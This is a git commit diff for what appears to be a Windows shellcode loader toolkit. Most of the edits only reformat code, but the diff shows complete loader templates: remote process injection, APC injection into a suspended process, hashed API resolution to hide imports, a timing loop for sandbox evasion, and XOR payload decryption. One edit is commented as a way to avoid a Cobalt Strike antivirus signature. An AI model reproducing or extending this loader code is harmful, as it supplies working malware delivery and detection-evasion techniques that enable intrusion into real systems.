This commit is contained in:
gatari
2024-02-23 14:47:45 +08:00
parent 3bd93e8529
commit 503783ac19
17 changed files with 227 additions and 218 deletions
+4 -4
View File
@@ -17,7 +17,7 @@ Externally defined shellcode variables:
#define MAX_PROCESSES 1024
#define PROCESS_NAME_MAX_LENGTH MAX_PATH
DWORD findPID( const char *token ) {
DWORD findPID( const char * token ) {
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !EnumProcesses( aProcesses, sizeof( aProcesses ), &cbNeeded ) ) {
@@ -47,7 +47,7 @@ DWORD findPID( const char *token ) {
return 0;
}
BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned char *shellcode ) {
BOOL Inject( DWORD pid, const char * target, size_t shellcodeSize, const unsigned char * shellcode ) {
HANDLE procHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid );
if ( procHandle == NULL ) {
printf( "[-] Could not open process handle\n" );
@@ -91,8 +91,8 @@ BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned
[!] Remember to remove the print strings when you are done debugging
*/
int main( int argc, char *argv[] ) {
const char *target = "notepad.exe";
int main( int argc, char * argv[] ) {
const char * target = "notepad.exe";
DWORD pid = findPID( target );
if ( pid == 0 ) {
+4 -4
View File
@@ -17,7 +17,7 @@ Externally defined shellcode variables:
#define MAX_PROCESSES 1024
#define PROCESS_NAME_MAX_LENGTH MAX_PATH
DWORD findPID( const char *token ) {
DWORD findPID( const char * token ) {
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !EnumProcesses( aProcesses, sizeof( aProcesses ), &cbNeeded ) ) {
@@ -47,7 +47,7 @@ DWORD findPID( const char *token ) {
return 0;
}
BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned char *shellcode ) {
BOOL Inject( DWORD pid, const char * target, size_t shellcodeSize, const unsigned char * shellcode ) {
HANDLE procHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid );
if ( procHandle == NULL ) {
printf( "[-] Could not open process handle\n" );
@@ -100,8 +100,8 @@ BOOL Inject( DWORD pid, const char *target, size_t shellcodeSize, const unsigned
[!] Remember to remove the print strings when you are done debugging
*/
int main( int argc, char *argv[] ) {
const char *target = "notepad.exe";
int main( int argc, char * argv[] ) {
const char * target = "notepad.exe";
DWORD pid = findPID( target );
if ( pid == 0 ) {
+1 -1
View File
@@ -11,7 +11,7 @@ Externally defined shellcode variables:
#include <windows.h>
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
LPVOID mem = VirtualAlloc( NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if ( mem == NULL ) {
+1 -1
View File
@@ -23,7 +23,7 @@ Externally defined IAT variables:
#include <stdio.h>
#include <windows.h>
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
if ( hLib == NULL ) {
+1 -1
View File
@@ -31,7 +31,7 @@ Externally defined IAT variables:
#include <windows.h>
#include <stdio.h>
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
if ( hLib == NULL ) {
@@ -32,7 +32,7 @@ Externally defined IAT variables:
#include <stdio.h>
#include <windows.h>
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
/*
@@ -62,7 +62,7 @@ int main( int argc, char *argv[] ) {
( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
BOOL( *WriteProcessMemory )
( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten );
( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten );
DWORD( *QueueUserAPC )
( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
@@ -149,9 +149,9 @@ int main( int argc, char *argv[] ) {
printf( "[+] Successfully resolved %zu hashes\n", sizeof( hashes ) / sizeof( hashes[0] ) );
printf( "[!!!] Beginning loader routine now. \n\n" );
STARTUPINFO si = { sizeof( si ) };
STARTUPINFO si = { sizeof( si ) };
PROCESS_INFORMATION pi = { 0 };
LPCSTR target = "C:\\Windows\\System32\\cmd.exe";
LPCSTR target = "C:\\Windows\\System32\\cmd.exe";
printf( "[-] Tasked to spawn: %s\n", target );
+1 -1
View File
@@ -20,7 +20,7 @@ Externally defined xorShellcode function:
*/
#include <windows.h>
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
/* Allocate memory for shellcode */
LPVOID mem = VirtualAlloc( NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+1 -1
View File
@@ -20,7 +20,7 @@ Externally defined xorShellcode function:
*/
#include <windows.h>
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
/* Allocate memory for shellcode */
LPVOID mem = VirtualAlloc( NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+4 -4
View File
@@ -10,12 +10,12 @@ Externally defined shellcode variables:
*/
#include <stdio.h>
#include <windows.h>
#include <windows.h>
int main( int argc, char *argv[] ) {
STARTUPINFO si = { sizeof( si ) };
int main( int argc, char * argv[] ) {
STARTUPINFO si = { sizeof( si ) };
PROCESS_INFORMATION pi = { 0 };
LPCSTR target = "${ PNAME }";
LPCSTR target = "${ PNAME }";
printf( "[+] Tasked to spawn: %s\n", target );
+173 -171
View File
@@ -3,8 +3,8 @@
Externally defined shellcode variables:
{
unsigned char shellcode[];
unsigned int shellcode_size;
unsigned char shellcode[];
unsigned int shellcode_size;
}
*/
@@ -14,7 +14,7 @@ Externally defined shellcode variables:
Externally defined xorShellcode function:
{
void xorShellcode(unsigned char *shellcode, unsigned int shellcode_size, unsigned char key);
void xorShellcode(unsigned char *shellcode, unsigned int shellcode_size, unsigned char key);
}
*/
@@ -24,7 +24,7 @@ Externally defined xorShellcode function:
Externally defined IAT variables:
{
FARPROC AddrFromHash( HMODULE hLib, uint64_t hashval, uint64_t seed );
FARPROC AddrFromHash( HMODULE hLib, uint64_t hashval, uint64_t seed );
}
*/
@@ -34,240 +34,242 @@ Externally defined IAT variables:
Externally defined Hash function:
{
uint64_t Hash( const char *str, uint64_t seed );
uint64_t Hash( const char *str, uint64_t seed );
}
*/
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <windows.h>
int main( int argc, char* argv[] ) {
int main( int argc, char * argv[] ) {
typedef struct {
BOOL( *CreateProcessA )
(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
typedef struct {
BOOL( *CreateProcessA )
( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
LPVOID( *VirtualAllocEx )
(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
LPVOID( *VirtualAllocEx )
( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
BOOL( *WriteProcessMemory )
(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesWritten);
BOOL( *WriteProcessMemory )
( HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten );
DWORD( *QueueUserAPC )
(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);
DWORD( *QueueUserAPC )
( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
DWORD( *ResumeThread )
(HANDLE hThread);
DWORD( *ResumeThread )
( HANDLE hThread );
DWORD( *WaitForSingleObject )
(HANDLE hHandle, DWORD dwMilliseconds);
DWORD( *WaitForSingleObject )
( HANDLE hHandle, DWORD dwMilliseconds );
BOOL( *CloseHandle )
(HANDLE hObject);
BOOL( *CloseHandle )
( HANDLE hObject );
BOOL( *VirtualFreeEx )
(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
BOOL( *VirtualFreeEx )
( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType );
} Overwat;
} Overwat;
/*
CreateProcessA -> 0x215613a9e
VirtualAllocEx -> 0x44fc51c32
WriteProcessMemory -> 0x593b94aae
QueueUserAPC -> 0x45688564c
ResumeThread -> 0x24b52292
WaitForSingleObject -> 0xd8670435
CloseHandle -> 0x2fba412b3
VirtualFreeEx -> 0x48238ac7f
zzazzl -> 0x40ba6a2ed
*/
/*
CreateProcessA -> 0x215613a9e
VirtualAllocEx -> 0x44fc51c32
WriteProcessMemory -> 0x593b94aae
QueueUserAPC -> 0x45688564c
ResumeThread -> 0x24b52292
WaitForSingleObject -> 0xd8670435
CloseHandle -> 0x2fba412b3
VirtualFreeEx -> 0x48238ac7f
zzazzl -> 0x40ba6a2ed
*/
/* Sandbox Evasion */
printf( "[*] Beginning sandbox evasion routine ...\n" );
/* Sandbox Evasion */
printf( "[*] Beginning sandbox evasion routine ...\n" );
const unsigned long long count_to = 10000000000;
const int bw = 50;
clock_t start, end;
double cpu_time_used;
const unsigned long long count_to = 10000000000;
const int bw = 50;
clock_t start, end;
double cpu_time_used;
start = clock();
start = clock();
for (unsigned long long i = 0; i < count_to; i++) {
if (i % 100000000 == 0) {
end = clock();
cpu_time_used = ((double)(end - start)) / CLOCKS_PER_SEC;
for ( unsigned long long i = 0; i < count_to; i++ ) {
if ( i % 100000000 == 0 ) {
end = clock();
cpu_time_used = ( (double)( end - start ) ) / CLOCKS_PER_SEC;
double progress = (double)i / count_to;
int pos = bw * progress;
double progress = (double)i / count_to;
int pos = bw * progress;
printf( "[" );
for (int j = 0; j < bw; ++j) {
if (j < pos) printf( "=" );
else if (j == pos) printf( ">" );
else printf( " " );
}
printf( "] %llu/%llu (%.2f%% complete, %f seconds elapsed)\n", i, count_to, progress * 100, cpu_time_used );
}
}
printf( "[" );
for ( int j = 0; j < bw; ++j ) {
if ( j < pos )
printf( "=" );
else if ( j == pos )
printf( ">" );
else
printf( " " );
}
printf( "] %llu/%llu (%.2f%% complete, %f seconds elapsed)\n", i, count_to, progress * 100, cpu_time_used );
}
}
end = clock();
cpu_time_used = ((double)(end - start)) / CLOCKS_PER_SEC;
printf( "Total time taken: %f seconds\n", cpu_time_used );
end = clock();
cpu_time_used = ( (double)( end - start ) ) / CLOCKS_PER_SEC;
printf( "Total time taken: %f seconds\n", cpu_time_used );
if (cpu_time_used < 2) {
printf( "[-] This is probably a sandbox, or someone attached a debugger and stepped over the loop\n" );
return 1;
}
if ( cpu_time_used < 2 ) {
printf( "[-] This is probably a sandbox, or someone attached a debugger and stepped over the loop\n" );
return 1;
}
printf( "[*] Sandbox evasion routine complete\n" );
printf( "[*] Sandbox evasion routine complete\n" );
/* Resolving WinAPI Functions */
/* Resolving WinAPI Functions */
printf( "[*] Resolving WinAPI functions ...\n" );
printf( "[*] Resolving WinAPI functions ...\n" );
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
if (hLib == NULL) {
printf( "Failed to load kernel32.dll\n" );
return 1;
}
HMODULE hLib = LoadLibraryA( "kernel32.dll" );
if ( hLib == NULL ) {
printf( "Failed to load kernel32.dll\n" );
return 1;
}
uint64_t hashes[] = {
0x215613a9e, 0x44fc51c32, 0x593b94aae, 0x45688564c, 0x24b52292, 0xd8670435, 0x2fba412b3, 0x48238ac7f };
uint64_t hashes[] = {
0x215613a9e, 0x44fc51c32, 0x593b94aae, 0x45688564c, 0x24b52292, 0xd8670435, 0x2fba412b3, 0x48238ac7f };
uint64_t seed = 5;
uint64_t seed = 5;
Overwat w;
Overwat w;
w.CreateProcessA = (BOOL( * )(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION))AddrFromHash( hLib, hashes[0], seed );
w.CreateProcessA = (BOOL( * )( LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION ))AddrFromHash( hLib, hashes[0], seed );
if (w.CreateProcessA == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[0] );
return 1;
}
if ( w.CreateProcessA == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[0] );
return 1;
}
w.VirtualAllocEx = (LPVOID( * )(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))AddrFromHash( hLib, hashes[1], seed );
w.VirtualAllocEx = (LPVOID( * )( HANDLE, LPVOID, SIZE_T, DWORD, DWORD ))AddrFromHash( hLib, hashes[1], seed );
if (w.VirtualAllocEx == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[1] );
return 1;
}
if ( w.VirtualAllocEx == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[1] );
return 1;
}
w.WriteProcessMemory = (BOOL( * )(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*))AddrFromHash( hLib, hashes[2], seed );
w.WriteProcessMemory = (BOOL( * )( HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T * ))AddrFromHash( hLib, hashes[2], seed );
if (w.WriteProcessMemory == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[2] );
return 1;
}
if ( w.WriteProcessMemory == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[2] );
return 1;
}
w.QueueUserAPC = (DWORD( * )(PAPCFUNC, HANDLE, ULONG_PTR))AddrFromHash( hLib, hashes[3], seed );
w.QueueUserAPC = (DWORD( * )( PAPCFUNC, HANDLE, ULONG_PTR ))AddrFromHash( hLib, hashes[3], seed );
if (w.QueueUserAPC == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[3] );
return 1;
}
if ( w.QueueUserAPC == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[3] );
return 1;
}
w.ResumeThread = (DWORD( * )(HANDLE))AddrFromHash( hLib, hashes[4], seed );
w.ResumeThread = (DWORD( * )( HANDLE ))AddrFromHash( hLib, hashes[4], seed );
if (w.ResumeThread == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[4] );
return 1;
}
if ( w.ResumeThread == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[4] );
return 1;
}
w.WaitForSingleObject = (DWORD( * )(HANDLE, DWORD))AddrFromHash( hLib, hashes[5], seed );
w.WaitForSingleObject = (DWORD( * )( HANDLE, DWORD ))AddrFromHash( hLib, hashes[5], seed );
if (w.WaitForSingleObject == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[5] );
return 1;
}
if ( w.WaitForSingleObject == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[5] );
return 1;
}
w.CloseHandle = (BOOL( * )(HANDLE))AddrFromHash( hLib, hashes[6], seed );
w.CloseHandle = (BOOL( * )( HANDLE ))AddrFromHash( hLib, hashes[6], seed );
if (w.CloseHandle == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[6] );
return 1;
}
if ( w.CloseHandle == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[6] );
return 1;
}
w.VirtualFreeEx = (BOOL( * )(HANDLE, LPVOID, SIZE_T, DWORD))AddrFromHash( hLib, hashes[7], seed );
w.VirtualFreeEx = (BOOL( * )( HANDLE, LPVOID, SIZE_T, DWORD ))AddrFromHash( hLib, hashes[7], seed );
if (w.VirtualFreeEx == NULL) {
printf( "Failed to resolve hash: %llx\n", hashes[7] );
return 1;
}
if ( w.VirtualFreeEx == NULL ) {
printf( "Failed to resolve hash: %llx\n", hashes[7] );
return 1;
}
FreeLibrary( hLib );
FreeLibrary( hLib );
printf( "[+] Successfully resolved %zu hashes\n", sizeof( hashes ) / sizeof( hashes[0] ) );
printf( "[+] Successfully resolved %zu hashes\n", sizeof( hashes ) / sizeof( hashes[0] ) );
/* Begin execution now. */
/* Begin execution now. */
printf( "[!!!] Beginning loader routine now. \n\n" );
printf( "[!!!] Beginning loader routine now. \n\n" );
STARTUPINFO si = { sizeof( si ) };
PROCESS_INFORMATION pi = { 0 };
LPCSTR target = "${ PNAME }";
STARTUPINFO si = { sizeof( si ) };
PROCESS_INFORMATION pi = { 0 };
LPCSTR target = "${ PNAME }";
printf( "[-] Tasked to spawn: %s\n", target );
printf( "[-] Tasked to spawn: %s\n", target );
if (!w.CreateProcessA( target, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi )) {
printf( "[-] Task 1: failed with error code %d. Unable to create the process.\n", GetLastError() );
return 1;
}
printf( "[+] OK: PID %d\n", pi.dwProcessId );
if ( !w.CreateProcessA( target, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) ) {
printf( "[-] Task 1: failed with error code %d. Unable to create the process.\n", GetLastError() );
return 1;
}
printf( "[+] OK: PID %d\n", pi.dwProcessId );
printf( "[-] Tasked to allocate memory to PID: %d\n", pi.dwProcessId );
LPVOID lpBaseAddress = w.VirtualAllocEx( pi.hProcess, NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if (lpBaseAddress == NULL) {
printf( "[-] Task 2: failed with error code %d. Unable to allocate memory in the target process.\n", GetLastError() );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
return 1;
}
printf( "[-] Tasked to allocate memory to PID: %d\n", pi.dwProcessId );
LPVOID lpBaseAddress = w.VirtualAllocEx( pi.hProcess, NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if ( lpBaseAddress == NULL ) {
printf( "[-] Task 2: failed with error code %d. Unable to allocate memory in the target process.\n", GetLastError() );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
return 1;
}
printf( "[+] OK: Address %p\n", lpBaseAddress );
printf( "[+] OK: Address %p\n", lpBaseAddress );
printf( "[-] Beginning decryption routine. \n" );
printf( "[-] Beginning decryption routine. \n" );
xorShellcode( shellcode, shellcode_size, "${ KEY }" );
xorShellcode( shellcode, shellcode_size, "${ KEY }" );
printf( "[+] Shellcode decryption complete.\n" );
printf( "[+] Shellcode decryption complete.\n" );
printf( "[-] Tasked to write shellcode to allocated memory in the target process...\n" );
if (!w.WriteProcessMemory( pi.hProcess, lpBaseAddress, shellcode, shellcode_size, NULL )) {
printf( "[-] Task 3: failed with error code %d. Unable to write to the allocated memory.\n", GetLastError() );
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
return 1;
}
printf( "[+] OK: Wrote %zu bytes to %p.\n", shellcode_size, lpBaseAddress );
printf( "[-] Tasked to write shellcode to allocated memory in the target process...\n" );
if ( !w.WriteProcessMemory( pi.hProcess, lpBaseAddress, shellcode, shellcode_size, NULL ) ) {
printf( "[-] Task 3: failed with error code %d. Unable to write to the allocated memory.\n", GetLastError() );
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
return 1;
}
printf( "[+] OK: Wrote %zu bytes to %p.\n", shellcode_size, lpBaseAddress );
printf( "[+] Queuing APC to the target thread...\n" );
if (!w.QueueUserAPC( (PAPCFUNC)lpBaseAddress, pi.hThread, NULL )) {
printf( "[-] Task 4: failed with error code %d. Unable to queue the APC.\n", GetLastError() );
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
return 1;
}
printf( "[+] Successfully queued an APC to address %p.\n", lpBaseAddress );
printf( "[+] Queuing APC to the target thread...\n" );
if ( !w.QueueUserAPC( (PAPCFUNC)lpBaseAddress, pi.hThread, NULL ) ) {
printf( "[-] Task 4: failed with error code %d. Unable to queue the APC.\n", GetLastError() );
w.VirtualFreeEx( pi.hProcess, lpBaseAddress, 0, MEM_RELEASE );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
return 1;
}
printf( "[+] Successfully queued an APC to address %p.\n", lpBaseAddress );
printf( "[+] Resuming the suspended thread (Thread ID: %d) in the target process...\n", pi.dwThreadId );
w.ResumeThread( pi.hThread );
printf( "[+] Thread resumed.\n" );
printf( "[+] Resuming the suspended thread (Thread ID: %d) in the target process...\n", pi.dwThreadId );
w.ResumeThread( pi.hThread );
printf( "[+] Thread resumed.\n" );
printf( "[+] Waiting for the target process to exit...\n" );
w.WaitForSingleObject( pi.hProcess, INFINITE );
printf( "[+] Process with PID %d exited.\n", pi.dwProcessId );
printf( "[+] Waiting for the target process to exit...\n" );
w.WaitForSingleObject( pi.hProcess, INFINITE );
printf( "[+] Process with PID %d exited.\n", pi.dwProcessId );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
w.CloseHandle( pi.hProcess );
w.CloseHandle( pi.hThread );
printf( "[+] Process and thread handles closed. Exiting...\n" );
return 0;
printf( "[+] Process and thread handles closed. Exiting...\n" );
return 0;
}
+3 -3
View File
@@ -2,10 +2,10 @@
#include <stdio.h>
#include <windows.h>
uint64_t Hash( const char *str, uint64_t seed ) {
const uint64_t p = 31;
uint64_t Hash( const char * str, uint64_t seed ) {
const uint64_t p = 31;
const uint64_t lp = 1000000007;
uint64_t ret = seed % lp;
uint64_t ret = seed % lp;
while ( *str ) {
ret = ( ( ret << 2 ) ^ ( (uint64_t)( *str ) << 1 ) ) % lp;
+10 -10
View File
@@ -22,21 +22,21 @@ FARPROC AddrFromHash( HMODULE hLib, uint64_t hashval, uint64_t seed ) {
fprintf( stdout, "[-] Tasked to resolve hash: 0x%llx\n", hashval );
FARPROC ret = NULL;
IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)hLib;
IMAGE_NT_HEADERS *ntHeader = (IMAGE_NT_HEADERS *)( (uint64_t)hLib + dosHeader->e_lfanew );
IMAGE_EXPORT_DIRECTORY *exportDir = (IMAGE_EXPORT_DIRECTORY *)( (uint64_t)hLib + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress );
uint32_t *nameTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfNames );
uint16_t *ordinalTable = (uint16_t *)( (uint64_t)hLib + exportDir->AddressOfNameOrdinals );
uint32_t *functionTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfFunctions );
FARPROC ret = NULL;
IMAGE_DOS_HEADER * dosHeader = (IMAGE_DOS_HEADER *)hLib;
IMAGE_NT_HEADERS * ntHeader = (IMAGE_NT_HEADERS *)( (uint64_t)hLib + dosHeader->e_lfanew );
IMAGE_EXPORT_DIRECTORY * exportDir = (IMAGE_EXPORT_DIRECTORY *)( (uint64_t)hLib + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress );
uint32_t * nameTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfNames );
uint16_t * ordinalTable = (uint16_t *)( (uint64_t)hLib + exportDir->AddressOfNameOrdinals );
uint32_t * functionTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfFunctions );
for ( uint32_t i = 0; i < exportDir->NumberOfNames; i++ ) {
char *name = (char *)( (uint64_t)hLib + nameTable[i] );
char * name = (char *)( (uint64_t)hLib + nameTable[i] );
uint64_t nameHash = Hash( name, seed );
if ( nameHash == hashval ) {
uint16_t ordinal = ordinalTable[i];
uint16_t ordinal = ordinalTable[i];
uint32_t functionRVA = functionTable[ordinal];
ret = (FARPROC)( (uint64_t)hLib + functionRVA );
ret = (FARPROC)( (uint64_t)hLib + functionRVA );
fprintf( stdout, "[+] Found: %s (0x%llx) at 0x%llx\n", name, hashval, ret );
break;
}
+2 -2
View File
@@ -10,8 +10,8 @@ Externally defined shellcode variables:
*/
#include <windows.h>
int main( int argc, char *argv[] ) {
void *exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
int main( int argc, char * argv[] ) {
void * exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
memcpy( exec, shellcode, shellcode_size );
( (void ( * )())exec )();
return 0;
+2 -2
View File
@@ -20,8 +20,8 @@ Externally defined xorShellcode function:
*/
#include <windows.h>
int main( int argc, char *argv[] ) {
void *exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
int main( int argc, char * argv[] ) {
void * exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
xorShellcode( shellcode, shellcode_size, "${KEY}" );
memcpy( exec, shellcode, shellcode_size );
( (void ( * )())exec )();
+6 -6
View File
@@ -16,14 +16,14 @@ Externally defined shellcode variables:
#define INITIAL_THREAD_CAPACITY 1024
int main( int argc, char *argv[] ) {
int main( int argc, char * argv[] ) {
HANDLE snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0 );
HANDLE rpoc = NULL;
HANDLE rpoc = NULL;
PROCESSENTRY32 procEntry = { sizeof( PROCESSENTRY32 ) };
PROCESSENTRY32 procEntry = { sizeof( PROCESSENTRY32 ) };
THREADENTRY32 threadEntry = { sizeof( THREADENTRY32 ) };
const wchar_t *pname = L"${ PNAME }";
const wchar_t * pname = L"${ PNAME }";
int threadCount = 0, cc = INITIAL_THREAD_CAPACITY;
@@ -76,7 +76,7 @@ int main( int argc, char *argv[] ) {
printf( "[+] Shellcode written to process: %S\n", pname );
DWORD *threadIds = malloc( sizeof( DWORD ) * cc );
DWORD * threadIds = malloc( sizeof( DWORD ) * cc );
if ( threadIds == NULL ) {
printf( "[-] Failed to allocate memory for thread IDs\n" );
CloseHandle( snapshot );
@@ -89,7 +89,7 @@ int main( int argc, char *argv[] ) {
if ( threadEntry.th32OwnerProcessID == procEntry.th32ProcessID ) {
if ( threadCount >= cc ) {
cc *= 2;
DWORD *temp = realloc( threadIds, sizeof( DWORD ) * cc );
DWORD * temp = realloc( threadIds, sizeof( DWORD ) * cc );
if ( temp == NULL ) {
printf( "[-] Failed to reallocate memory for thread IDs\n" );
free( threadIds );
+1 -1
View File
@@ -1,3 +1,3 @@
// Don't touch this file!
unsigned char shellcode[] = ${ SHELLCODE };
unsigned char shellcode[] = ${ SHELLCODE };
unsigned int shellcode_size = ${ SHELLCODE_SIZE };
+9 -2
View File
@@ -1,10 +1,17 @@
#include <string.h>
#include <windows.h>
void xorShellcode( unsigned char *shellcode, size_t shellcodeSize, const char *key ) {
void xorShellcode( unsigned char * shellcode, size_t shellcodeSize, const char * key ) {
size_t keyLen = strlen( key );
unsigned char temp;
for ( size_t i = 0; i < shellcodeSize; ++i ) {
shellcode[i] ^= key[i % keyLen];
temp = key[i % keyLen];
/* Avoid: Trojan:Win64/CobaltStrike.PACZ!MTB */
temp ^= 0xFF;
temp ^= 0xFF;
shellcode[i] ^= temp;
}
}